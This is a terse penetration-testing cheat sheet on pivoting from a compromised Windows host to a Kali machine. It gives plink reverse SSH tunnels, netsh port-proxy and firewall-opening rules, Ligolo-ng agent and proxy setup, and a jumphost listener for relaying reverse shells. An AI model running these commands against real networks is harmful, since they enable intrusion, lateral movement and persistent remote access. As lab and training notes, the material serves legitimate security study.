Port Forwarding and SSH Tunneling
ssh.exe
Find ssh with command:
where sshFor the tunneling part see:
Port Forwarding and SSH Tunnelingplink.exe
Network administrators can avoid leaving ssh on the computers. When this happens you are able to upload plink.exe (PuTTY command line counterpart).
plink.exe -ssh -l kali -pw <KALI_PASSWORD> -R 127.0.0.1:<KALI_PORT>:127.0.0.1:<WINDOWS_PORT_TO_FORWARD> <KALI_IP> # loopbakc can be windows RDP portVerify the open port on kali:
ss -ntpluNetsh
Native way to create a port forward on Windows
Add rule which binds remote port to local machine:
netsh interface portproxy add v4tov4 listenport=<LOCAL_PORT_BIND> listenaddress=<LOCAL_SERVER> connectport=<PORT_TO_FORWARD> connectaddress=DESTINATION_SERVERCheck if port is listening
netstat -anp TCP | find "<PORT>"Add firewall rule that opens a port:
netsh advfirewall firewall add rule name="<RULE_NAME>" protocol=TCP dir=in localip=<LOCAL_IP> localport=<PORT_TO_OPEN> action=allowConfirm that port forward is stored:
netsh interface portproxy show allLigolo
Ligolo link: https://github.com/nicocha30/ligolo-ng
Network visibility
Kali set up
Add interface:
sudo ip tuntap add user kali mode tun ligoloEnable interface:
sudo ip link set ligolo upRun ligolo proxy:
chmod +x proxy./proxy -selfcertWindows set up
.\agent.exe -connect <KALI_IP>:<LIGOLO_SERVER_PORT> -ignore-certContinue after establishing connection on Kali:
List sessions and choose the created one:
sessionAdd network to routing tables:
sudo ip route add <3_OCTET_SUBNET>.0/24 dev ligoloVerify:
ip route listStart in ligolo:
startPort Forwarding
Add listener (in kali ligolo):
Any connection that is coming to our jumphost on REV_SH_SPECIFIED_PORT is going to be transmitted to KALI_NC_PORT
During reverse shell creation specify the IP and PORT on the jumphost instead of kali's.
listener_add --addr 0.0.0.0:<JUMP_PORT> --to 127.0.0.1:<KALI_PORT>Last updated